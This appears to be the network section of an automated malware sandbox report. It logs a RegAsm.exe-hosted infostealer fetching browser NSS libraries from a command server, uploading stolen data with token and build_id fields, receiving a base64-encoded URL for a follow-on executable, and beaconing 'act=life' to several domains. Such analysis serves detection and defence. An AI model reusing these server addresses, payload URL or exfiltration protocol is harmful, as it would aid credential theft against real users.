
Timestamp | Bytes transferred | Direction | Data
2024-10-03 07:16:23 UTC | 195 | OUT | GET /freebl3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-03 07:16:23 UTC | 262 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 07:16:23 GMT
Content-Type: application/octet-stream
Content-Length: 685392
Connection: close
Last-Modified: Thursday, 03-Oct-2024 07:16:23 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.6 | 49732 | 49.12.197.9 | 443 | 6880 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 07:16:25 UTC | 195 | OUT | GET /mozglue.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-03 07:16:25 UTC | 262 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 07:16:25 GMT
Content-Type: application/octet-stream
Content-Length: 608080
Connection: close
Last-Modified: Thursday, 03-Oct-2024 07:16:25 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.6 | 49733 | 49.12.197.9 | 443 | 6880 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 07:16:26 UTC | 196 | OUT | GET /msvcp140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-03 07:16:26 UTC | 262 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 07:16:26 GMT
Content-Type: application/octet-stream
Content-Length: 450024
Connection: close
Last-Modified: Thursday, 03-Oct-2024 07:16:26 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 49735 | 49.12.197.9 | 443 | 6880 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 07:16:28 UTC | 196 | OUT | GET /softokn3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-03 07:16:28 UTC | 262 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 07:16:28 GMT
Content-Type: application/octet-stream
Content-Length: 257872
Connection: close
Last-Modified: Thursday, 03-Oct-2024 07:16:28 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


                                                                                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                                                      15          192.168.2.6  49736        49.12.197.9     443               6880  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      Timestamp                Bytes transferred  Direction  Data
                                                                                                                                                      2024-10-03 07:16:29 UTC  200                OUT        GET /vcruntime140.dll HTTP/1.1
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 49.12.197.9
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-10-03 07:16:29 UTC  261                IN         HTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:29 GMT
                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                      Content-Length: 80880
                                                                                                                                                      Connection: close
                                                                                                                                                      Last-Modified: Thursday, 03-Oct-2024 07:16:29 GMT
                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                      Accept-Ranges: bytes


                                                                                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                                                      16          192.168.2.6  49737        49.12.197.9     443               6880  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      Timestamp                Bytes transferred  Direction  Data
                                                                                                                                                      2024-10-03 07:16:30 UTC  192                OUT        GET /nss3.dll HTTP/1.1
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 49.12.197.9
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-10-03 07:16:31 UTC  263                IN         HTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:31 GMT
                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                      Content-Length: 2046288
                                                                                                                                                      Connection: close
                                                                                                                                                      Last-Modified: Thursday, 03-Oct-2024 07:16:31 GMT
                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      Data Ascii: 4D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.6 | 49738 | 49.12.197.9 | 443 | 6880 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 07:16:33 UTC | 277 | OUT | POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----EBKKKEGIDBGHIDGDHDBF
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Content-Length: 1025
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-10-03 07:16:33 UTC | 1025 | OUT | Data Ascii:
    ------EBKKKEGIDBGHIDGDHDBF
    Content-Disposition: form-data; name="token"

    039b7602cef4e610f9251887c9a84f91
    ------EBKKKEGIDBGHIDGDHDBF
    Content-Disposition: form-data; name="build_id"

    bb7310eab4245006f125c442da2d1e50
    ------EBKKKEGIDBGHIDGDHDBF
    Cont
2024-10-03 07:16:34 UTC | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 03 Oct 2024 07:16:34 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
2024-10-03 07:16:34 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.6 | 49739 | 49.12.197.9 | 443 | 6880 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 07:16:35 UTC | 276 | OUT | POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----BAKEBAFIIECBGCAAAAFC
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-10-03 07:16:35 UTC | 331 | OUT | Data Ascii:
    ------BAKEBAFIIECBGCAAAAFC
    Content-Disposition: form-data; name="token"

    039b7602cef4e610f9251887c9a84f91
    ------BAKEBAFIIECBGCAAAAFC
    Content-Disposition: form-data; name="build_id"

    bb7310eab4245006f125c442da2d1e50
    ------BAKEBAFIIECBGCAAAAFC
    Cont
2024-10-03 07:16:36 UTC | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 03 Oct 2024 07:16:35 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
2024-10-03 07:16:36 UTC | 2228 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.6 | 49740 | 49.12.197.9 | 443 | 6880 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 07:16:36 UTC | 276 | OUT | POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----KJDGDGDHDGDBFIDHDBAF
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-10-03 07:16:36 UTC | 331 | OUT | Data Ascii:
    ------KJDGDGDHDGDBFIDHDBAF
    Content-Disposition: form-data; name="token"

    039b7602cef4e610f9251887c9a84f91
    ------KJDGDGDHDGDBFIDHDBAF
    Content-Disposition: form-data; name="build_id"

    bb7310eab4245006f125c442da2d1e50
    ------KJDGDGDHDGDBFIDHDBAF
    Cont
2024-10-03 07:16:37 UTC | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 03 Oct 2024 07:16:37 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
2024-10-03 07:16:37 UTC | 1524 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.6 | 49742 | 49.12.197.9 | 443 | 6880 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 07:16:38 UTC | 276 | OUT | POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----DHDHCGHDHIDHCBGCBGCA
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Content-Length: 461
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-10-03 07:16:38 UTC | 461 | OUT | Data Ascii:
    ------DHDHCGHDHIDHCBGCBGCA
    Content-Disposition: form-data; name="token"

    039b7602cef4e610f9251887c9a84f91
    ------DHDHCGHDHIDHCBGCBGCA
    Content-Disposition: form-data; name="build_id"

    bb7310eab4245006f125c442da2d1e50
    ------DHDHCGHDHIDHCBGCBGCA
    Cont
2024-10-03 07:16:38 UTC | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 03 Oct 2024 07:16:38 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
2024-10-03 07:16:38 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.6 | 49743 | 49.12.197.9 | 443 | 6880 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 07:16:40 UTC | 278 | OUT | POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----JEGHCBAFBFHIIECBKFCG
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Content-Length: 98121
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-10-03 07:16:40 UTC | 16355 | OUT | Data Ascii:
    ------JEGHCBAFBFHIIECBKFCG
    Content-Disposition: form-data; name="token"

    039b7602cef4e610f9251887c9a84f91
    ------JEGHCBAFBFHIIECBKFCG
    Content-Disposition: form-data; name="build_id"

    bb7310eab4245006f125c442da2d1e50
    ------JEGHCBAFBFHIIECBKFCG
    Cont
2024-10-03 07:16:40 UTC | 16355 | OUT
2024-10-03 07:16:40 UTC | 16355 | OUT
2024-10-03 07:16:40 UTC | 16355 | OUT
2024-10-03 07:16:40 UTC | 16355 | OUT
2024-10-03 07:16:40 UTC | 16346 | OUT
2024-10-03 07:16:41 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:41 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
2024-10-03 07:16:41 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.6 | 49744 | 49.12.197.9 | 443 | 6880 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 07:16:42 UTC | 276 | OUT | POST / HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----IIDHJKFBGIIJJKFIJDBG
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 49.12.197.9
                                                                                                                                                      Content-Length: 331
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
2024-10-03 07:16:42 UTC | 331 | OUT | Data Ascii: ------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="token"039b7602cef4e610f9251887c9a84f91------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------IIDHJKFBGIIJJKFIJDBGCont
2024-10-03 07:16:42 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:42 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
2024-10-03 07:16:42 UTC | 99 | IN | Data Ascii: 58MTI2NzI0M3xodHRwOi8vMTQ3LjQ1LjQ0LjEwNC9sZG1zLzY2ZmUxM2QyNTFiYmZfbHNvZC5leGV8MXxra2trfA==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.6 | 49746 | 49.12.197.9 | 443 | 6880 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 07:16:44 UTC | 276 | OUT | POST / HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----DAKJDHIEBFIIDGDGDBAE
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 49.12.197.9
                                                                                                                                                      Content-Length: 499
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
2024-10-03 07:16:44 UTC | 499 | OUT | Data Ascii: ------DAKJDHIEBFIIDGDGDBAEContent-Disposition: form-data; name="token"039b7602cef4e610f9251887c9a84f91------DAKJDHIEBFIIDGDGDBAEContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------DAKJDHIEBFIIDGDGDBAECont
2024-10-03 07:16:45 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:45 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
2024-10-03 07:16:45 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.6 | 49747 | 172.67.208.141 | 443 | 5388 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 07:16:45 UTC | 264 | OUT | POST /api HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                      Content-Length: 8
                                                                                                                                                      Host: questionsmw.store
2024-10-03 07:16:45 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                      Data Ascii: act=life
2024-10-03 07:16:45 UTC | 799 | IN | HTTP/1.1 200 OK
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:45 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      Set-Cookie: PHPSESSID=jdj2rq3d0a75mrggtnopkm3osb; expires=Mon, 27 Jan 2025 01:03:24 GMT; Max-Age=9999999; path=/
                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                      vary: accept-encoding
                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=INKnYej4bdfNmKZ%2FG3nci%2FSg1VjlPSvmPz%2BjxvAUjNdllu3rRGptAzbDuWOqrmHKe%2FBLkotXzPQwzDBzd86OcOsnnVXMgatKqP7bHVB3RMopHul6Z7rJrlgYugUQjajXTYT0zQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 8ccb2605bad41774-EWR
2024-10-03 07:16:45 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                      Data Ascii: aerror #D12
2024-10-03 07:16:45 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.6 | 49748 | 188.114.96.3 | 443 | 5388 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 07:16:45 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                      Content-Length: 8
                                                                                                                                                      Host: soldiefieop.site
2024-10-03 07:16:45 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                      Data Ascii: act=life
2024-10-03 07:16:46 UTC | 787 | IN | HTTP/1.1 200 OK
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:46 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      Set-Cookie: PHPSESSID=okt3snqgipsnoggsp7auq3eqnj; expires=Mon, 27 Jan 2025 01:03:25 GMT; Max-Age=9999999; path=/
                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                      vary: accept-encoding
                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6d39EccorWKQ8Onyix9SK1i8RPtpUBjVKZNsaVTXBdN5jhgbQRNDPiDmB41q4Z1zmou%2BRLyFvpFcfsSCoJ4rHTtKyVyYSddhMtnOUX1DEHcnhlbYuyVLimC6M3hnrrRWYq%2BC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 8ccb260b88060c8e-EWR
2024-10-03 07:16:46 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                      Data Ascii: aerror #D12
2024-10-03 07:16:46 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.6 | 49749 | 49.12.197.9 | 443 | 6880 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 07:16:46 UTC | 276 | OUT | POST / HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----AEGHIJEHJDHIDHIDAEHC
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 49.12.197.9
                                                                                                                                                      Content-Length: 331
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
2024-10-03 07:16:46 UTC | 331 | OUT | Data Ascii: ------AEGHIJEHJDHIDHIDAEHCContent-Disposition: form-data; name="token"039b7602cef4e610f9251887c9a84f91------AEGHIJEHJDHIDHIDAEHCContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------AEGHIJEHJDHIDHIDAEHCCont
2024-10-03 07:16:47 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:47 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
2024-10-03 07:16:47 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.6 | 49750 | 172.67.152.190 | 443 | 5388 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 07:16:46 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                      Content-Length: 8
                                                                                                                                                      Host: abnomalrkmu.site
2024-10-03 07:16:46 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                      2024-10-03 07:16:47 UTC791INHTTP/1.1 200 OK
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:47 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      Set-Cookie: PHPSESSID=3mcuddpm72bnf4h3ik1gq316dp; expires=Mon, 27 Jan 2025 01:03:26 GMT; Max-Age=9999999; path=/
                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                      vary: accept-encoding
                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c5w%2FHTavmcifp4M%2FQt9pUW%2B59rU3e6CcUJpqKuMKFuZ0IXqyIBIo017k6Wz5rSaOVJTKekpmoziN3zMh4091NJw5M6OG2P2PVDnUyY6CxZazQsEbITLDcJ3xy%2BE5aZvlwgsS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 8ccb26118ed143b9-EWR
2024-10-03 07:16:47 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
Data Ascii: aerror #D12
2024-10-03 07:16:47 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.6 | 49752 | 104.21.84.18 | 443 | 5388 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 07:16:47 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                      Content-Length: 8
                                                                                                                                                      Host: treatynreit.site
2024-10-03 07:16:47 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-10-03 07:16:49 UTC | 770 | IN | HTTP/1.1 200 OK
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:49 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      Set-Cookie: PHPSESSID=ah8tedmnbbknld2u2hb852isou; expires=Mon, 27 Jan 2025 01:03:28 GMT; Max-Age=9999999; path=/
                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SxJ9UKS%2Fcs%2FDmNETSvLEW3yqwcWwc0gQ6lybAnXho1Z966x0fkRgrHloJVZyE%2BIzbpsOtDi6akDkcDUz%2Fiis3S6er%2Fdx5FeaxM4dJVIxi8VXDNeorYcjqdQuiVTs8bOqK4xt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 8ccb2617add8de96-EWR
2024-10-03 07:16:49 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
Data Ascii: aerror #D12
2024-10-03 07:16:49 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.6 | 49753 | 104.21.18.193 | 443 | 5388 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 07:16:49 UTC | 264 | OUT | POST /api HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                      Content-Length: 8
                                                                                                                                                      Host: snarlypagowo.site
2024-10-03 07:16:49 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-10-03 07:16:50 UTC | 801 | IN | HTTP/1.1 200 OK
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:50 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      Set-Cookie: PHPSESSID=vhtcpdqkbdsbbnq7ngco06lk3v; expires=Mon, 27 Jan 2025 01:03:29 GMT; Max-Age=9999999; path=/
                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                      vary: accept-encoding
                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cuXGMQd5ERii2ugEyiqi0ZEW%2BKjy0j%2BP%2BQtB4tUUUrXOJJQhIqDkxd4zESJ%2FmbY24oATrCGWcGgRQPnAsufolBxoOWGLpP3KtDAJgiOrijJcMbFAh3Vmm%2BSw2AfzK09D8ssMEw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 8ccb26241ad14345-EWR
2024-10-03 07:16:50 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
